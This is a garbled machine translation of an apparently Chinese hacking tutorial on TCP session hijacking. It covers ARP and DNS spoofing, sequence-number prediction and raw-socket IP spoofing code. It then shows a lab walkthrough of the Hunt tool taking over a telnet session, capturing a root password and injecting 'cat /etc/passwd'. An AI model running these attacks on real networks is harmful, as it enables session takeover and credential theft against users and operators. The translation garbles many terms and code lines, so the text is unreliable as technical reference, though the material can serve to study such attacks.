Introduction usually, everyone's invasion is aimed at a host. After obtaining administrator privileges, it is very proud; in fact, the real intrusion is occupying the entire internal network. There is a lot of attack methods for the internal network, but more effective methods are non-ARP spoofing, and DNS deceives are not. However, no matter what technology used, it is nothing more than grasping the target's packet, and then analyzing sensitive data. If the target is used in the target (using the Hub Hub Network), then you only need to set the NIC to "Mixed Mode", hang the sniffier, you can simide the data you want to get. If it is a switched network (using a switch network), this method will not pass, because three network environments are unable to span for sniffer: "Bridge", "Switch", "Router". Unfortunately, for ARP spoofing, switching networks still incompetent, if we use ARP deception, in a higher level of "intrusion", thereby truly control internal networks. This is also the session hijacking attack on this article ... I. Confirmation of the session 1, what is the session hijacked in real life, such as you go to the market to buy vegetables, you ask for some other things first after paying the money, Take the dish later; if a stranger is asked to take the dish, the people who sell vegetables will give the dish to strangers? ! Of course, this is just a metaphor, but this is just a metaphor of session. The so-called session is a communication between two hosts. For example, you telnet to a host, this is a Telnet session; you browse a website, this is an HTTP session. The session hijack is a combination of attacks, and sniffing techniques. For example, in a normal session process, an attacker is involved in a third party, he can insert malicious data in the normal packet, or you can simide the session between the two parties, or even replace a host take over the session. . We can divide the session hijacking into two types: 1) MANI in the Middle Middle, Mitm, 2) Injection; and can also divide the session hijacking into two forms: 1) Passive hijacking, 2) Active hijacking; passive hijacking is actually the data stream of the two parties in the background, the active data is obtained in the cluster; and the active hijacking is the "kick" "kick" it under the session, and then attack Substituted and take over the session, this attack method is very harmful, and attackers can do a lot of things, such as "CAT ETC / MASTER.PASSWD" (SHADOW file under FreeBSD). Mitm Attack Introduction This is what we often say "Intermediary attack", which is more discussive online is the SMB session hijacking, which is also a typical intermediary attack. To implement the intermediary attack, the attacker first needs to use ARP spoof or DNS spoof, and the communication between the sessions is expanded, and this change is completely transparent to both parties. About ARP deception hacan defense line introduction is more, online information is also more, I will not talk more, I just talk about DNS deception. DNS (Domain Name System), the domain name server, we have to use almost every day.
For normal DNS requests, for example, enter www.hacker.com.cn in the browser, then view the HOSTS file first, if there is a corresponding IP, use this IP address to access the website (in fact, using the HOSTS file to implement DNS Deception); if not, the DNS server will be requested; the DNS server then resolves its corresponding IP address, returns to me, and finally you can log in to the website of the hacking line. And DNS spoof is, the target sends its DNS request to the attacker, then the attacker for DNS response will replace the correct IP address as other IP, then you will log in to the IP specified by this attacker, and the attacker is early Just arrange a malicious web page in this IP, but you have already been "set" in the attacker, but you can do it in WAN, more common, "Web Server Redirect", "Mail Server Redirection", etc. But regardless of ARP spoof, or DNS spoof, middleman attacks change the normal traffic flow, it is equivalent to a transparent agent between the two sides of the session, you can get everything I want to know, or even use some defective encryption agreement. achieve. Introduction to Injection Attack This method of session hijacking is simpler than the intermediary attack, it does not change the communication flow between the session, but insert the normal communication stream in both parties. In the injection attack, two technologies need to be implemented: 1) IP deception, 2) predict the TCP serial number. If it is a UDP protocol, simply falsify the IP address, then it can be sent, because the UDP does not have a so-called TCP three-time handshake, but the UDP-based application protocol has a flow control mechanism, so there are some additional work. For IP deception, there are two situations that need to be used: 1) Hide your IP address; 2) Implement invasion with the trust relationship between two machines. On the UNIX / Linux platform, you can use the socket to construct the IP package directly, fill in false IP addresses in the IP header, but require root privileges; on the Windows platform, Winsock cannot be used, you need to use WinPacp (you can also use libnet). For example, in the Linux system, first open a Raw Socket, then write IP headers and other data yourself.
Refer to the following example code: sockfd = socket (AF_INET, SOCK_RAW, 255); setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, & on, sizeof (on)); struct ip * ip; struct tcphdr * tcp; struct pseudohdr pseudoheader; ip- > ip_src.s_addr = xxx; pseudoheader.saddr.s_addr = ip-> ip_src.s_addr; tcp-> check = tcpchksum ((u_short *) & pseudoheader, 12 sizeof (struct tcphdr)); sendto (sockfd, buf, len, 0, (const SockAddr *) Addr, SIZEOF (STRUCKADDR_IN)); For TCP-based injection sessions, attackers should first use sniffing technology to simply simply, and then construct the correct information from the brief information. The serial number, if not, you must first guess the target's ISN (initial serial number), which is increasingly hijacking the session. Then why do you want to guess the serial number of the session? please watch the following part.
2, TCP session hijacking this article mainly describes the session hijacking of TCP protocols. If you hijack some unreliable agreements, it will be easy because they do not provide some authentication measures; and the TCP protocol is to be a reliable transmission protocol, so you have to discuss it. According to the provisions in TCP / IP, communicate with TCP protocols require two serial numbers, TCP protocols use these two sequence numbers to ensure connection synchronization and secure communication, system TCP / IP protocol stack based on time or linear generation of these values . During communication, the serial number of both sides is interdependent, which is why TCP protocols are reliable transfer protocols (see RFC 793). If the attacker is hijacking at this time, the result is definitely a failure, because the session "does not know" attacker, the attacker cannot provide legal serial numbers; so the key to the session hijack is to predict the correct serial number, the attacker can Take the sniffing technology to get this information. The serial number of the TCP protocol is now discussed related issues related to the serial number of the TCP protocol. In each packet, there are two serial numbers, which are: SEQ: The first byte of the current packet, the number ACK: expects to receive the first byte of the first byte of the other party, assume the two sides Now you need to connect: S_SEQ: The next byte of the next byte to be sent: The next byte of the next byte to receive: receives the window // or more to the server (Server) c_seq: the next byte to be sent. Serial number c_ack: The next byte of the next byte to be received: The receiving window // or above must meet the following logical relationships, otherwise the data package will be discarded and returned an ACK package (including The desired serial number). C_Ack <= c_seq <= c_ack c_winds_ack <= s_seq <= s_ack s_wind If the logical relationship does not meet the logical relationship of the upper side, it will be "deadly weaknesses". Please look down. Deadly weakness This fatal weakness is the ACK Storm. When the session receives an undesired packet, return ACK packets with your desired serial number; and on the other end, this packet is not expected, and will return ACK again with your desired serial number. Package ... so, in this way, go back and forth, forming a vicious circle, eventually leading to the ACK storm. The better solution is to make ARP spoof, so that the data package "normal" is sent to the attacker, and then set the package forward, and finally you can hijack, and you don't have to worry that there will be ACK storms. Of course, not all systems will appear ACK storm. For example, the TCP / IP protocol stack of the Linux system is slightly different from the description of the RFC. Note that the ACK storm is only hijacked in the injection.
TCP session hijacking process hypothesis Now the host A and host B are turned a TCP session, C is an attacker, the hijacking process is as follows: A Seq (HEX): X Ack (HEX): YFlags: -ap --- Window: zzzz, package size is: 60B response A A packet SEQ (HEX): Y Ack (HEX): x 60Flags: -ap --- Window: zzzz, package size is: 50A responding to a packet SEQ (HEX): X 60 Ack (HEX): Y 50Flags: -ap --- Window: zzzz, package size is: 40B to a responding to a packet SEQ (HEX): Y 50 ACK (HEX): X 100Flags: -ap --- window: zzzz, package size is: 30 Attacks C pretending host A Seq (HEX): X 100 ACK (HEX): Y 80Flags: -ap- - Window: ZZZZ, package size is: 20b responding to a packet SEQ (HEX): Y 80 ACK (HEX): x 120 flags: -ap --- window: zzzz, package size is: 10 The host B executes the command of the attacker C pretending to send the host A, and returns a packet of the host A; however, the host A does not recognize the data packet sent by the host B, so host A will return with the desired serial number Give the host B a packet, and then form an ACK storm. If the ACK storm (such as the ARP spoofed) mentioned before, you can successfully make a session hijacking. It is said that the theoretical knowledge is here, and I will demonstrate a session hijacker with a specific example. Second, the session hijacking practice 1, jealousy
There are many tools that can be hijacked. Compare juggernaut, which can make TCP sessions hijacked network Sniffer programs; TTY Watcher, and it is a connection to the connection on a single host. Hijack. There is also a toolkit such as DSNIFF, you can also hijack the session, just see if you will use it. However, you can hijack the session, but also the tool of hunt. Its author is Pavel Krauz, which can work under Linux and some UNIX platforms. Its function is very powerful, first, whether it is in a shared network or a switched network, it can work properly; secondly, an interian attack and injection attack can be performed. You can also perform sniffing, view sessions, monitoring sessions, resetting sessions. Through the previous narrative, we know that in the injection attack, it is easy to appear ACK storm. The solution is to make ARP spoof; and when using Hunt to attack, it does not make ARP spoof, but after the session, after the session, The session sends a TCP package with the RST flag to interrupt the session to avoid the ACK storm to continue. The intermediary attack is the first ARP spoof and then the session is hijacked. The latest version of Hunt is 1.5, you can download the source code package and binary files to the Pavel Krauz website: http://lin.fsid.cvut.cz/~kra/# Hunt. Now let's see if you use hunt, you first download and compile the source code: [root @ dahubaobao hunt] #wget http://www.ringz.org/hunt-1.5.tgz[Root@dahubaobao hunt] #tar zxvf hunt- 1.5.tgz [root @ dahubaobao hunt] #CD hunt-1.5 [root @ dahubaobao hunt-1.5] #make [root @ dahibaobao hunt-1.5] #. / Hunt // hunt is the operation of completely explaining each option Meaning L / W / R) List / Watch / Reset Connections // L (Letter L) is a session on the current network; W is a session on the current network; R is resetting a session on the current network. . a) ARP / Simple Hijack (Avoids Ack Storm if ARP Used) // Intermediates attack (session hijacking), Hunt first performs ARP spoof, and then hijacked. Use this method to avoid ACK storms. s) Simple Hijack // Simple session hijacking, that is, injectable attack. Ack storm will appear. d) DAEMONS RST / ARP / SNIFF / MAC / / This option achieves four functions, which are: termination sessions, automatically send TCP packages with RST flags; ARP deception, packet forward; do not say, sniff Function; collect the MAC address on the current network. Other options are simple, not more.
Let's take a look at the specific example, I think everyone can't wait! ^ _ ^ 2, Application Example Test Environment: Attacker: Red Hat Linux 9.0 IP: 192.168.0.10 Host A: Windows Advanced Server IP: 192.168.0.1 Host B: FreeBSD 4.9 Stable IP: 192.168.0.20 [root @ dahubaobao hunt- 1.5] #. / Hunt / ** hunt 1.5 * Multipurpose Connection Intruder / Sniffer for Linux * (c) 1998-2000 BY KRA * / STARTING HUNT --- Main Menu --- Rcvpkt 0, Free / Alloc 63/64 - --- L / W / R) List / Watch / RESET Connectionsu) Host Up Testsa) SIMPE Hijackd) SIMPLE Hijackd) DAEMONS RST / ARP / SNIFF / MACO) OptionsX) EXIT *> L // View session on the current network 0) 192.168.0.1 [3465]? 192.168.0.20 [23] // host A is telnet to host B --- Main menu --- Rcvpkt 0, Free / Alloc 63/64 ------ l / w / r) list / watch / reset connectionsu) Host Up testsa) ARP / SIMPLE HIJACK (Avoids Ack Storm if ARP Used) S) SIMPLE HIJACKD) DAEMONS RST / ARP / SNIFF / Maco) OptionsX) EXIT *> W // Monitor session on the current network 0) 192.168.0.1 [3465]? 192.168.0.20 [23] Choose Conn> 0 // Select a session that intends to monitor. Since my conditions are limited, I can't simulate multiple sessions, please see more. Dump [S] RC / [D] ST / [B] OTH [B]> // Enter Print Sec / DST Same Charactes Y / N [N]> // Enter
You can monitor the session now. All content entered by host A, we can see it. Host A after telnet and login, directly su root, password: The password behind the root. Now this system has been completely controlled, let's play! --- Main Menu --- RCVPKT 0, Free / Alloc 63/64 ------ L / W / R) List / Watch / Reset Connectionsu) Host Up Testsa ARP / Simple Hijack (Avoids Ack Storm if ARP Used) S) SIMPLE HiJackD) Daemons RST / ARP / SNIFF / MACO) OptionsX) EXIT *> S // Injection Session Hiking 0) 192.168.0.1 [3465]? 192.168.0.20 [23] Choose Conn> 0dump Connection Y / n [n]> Enter the command String You wish executed or [cr]> CAT / etc / passwd attacker intent is to get the contents of the PASSWD file of host B, but due to injection of hijacking defects, the ACK storm is caused. Therefore, hunt sends a TCP package with RST flag to block the ACK storm. --- Main Menu --- RCVPKT 0, Free / Alloc 63/64 ------ L / W / R) List / Watch / Reset Connectionsu) Host Up Testsa ARP / Simple Hijack (Avoids Ack Storm if ARP Used) S) SIMPLE HIJACKD) DAEMONS RST / ARP / SNIFF / MACO) OptionsX) EXIT *> A // Take Intermediate People Session Hijack 0) 192.168.0.1 [3862]? 192.168.0.20 [23] Choose Conn> 0arp Spoof Src in DST Y / N [Y]> SRC Mac [xx: xx: xx: xx: xx: xx]> ARP SPOOF DST IN SRC Y / N [Y]> DST Mac [xx: xx: xx: xx: xx: xx ]> Input Mode [R] AW, [L] INE ECHO / R, LINE [E] CHO [R]> Dump Connectin Y / N [Y]> NPRESS Key To Take Voer of Connectionarp Spoof of 192.168.0.20 with fake Mac xx: xx: xx: xx: xx: xx in host 192.168.0.1 faileddo you want to forward arp spoof nutil successed y / n [y]> ctrl-c to breakctrl c // manual input CTRL C interrupt, no Need to wait - Operation Canceled - Press any key> arp spoof failedarp spoof of 192.168.0.20 in host 192.168.0.1 failedyou Took over the connectionCtrl-] to break-bash-2.05b $ ID .......... ........ Now, the attacker has successfully hijacked the Telnet session between host a and b. All command attackers entering host A can be seen, and an attacker can insert the command.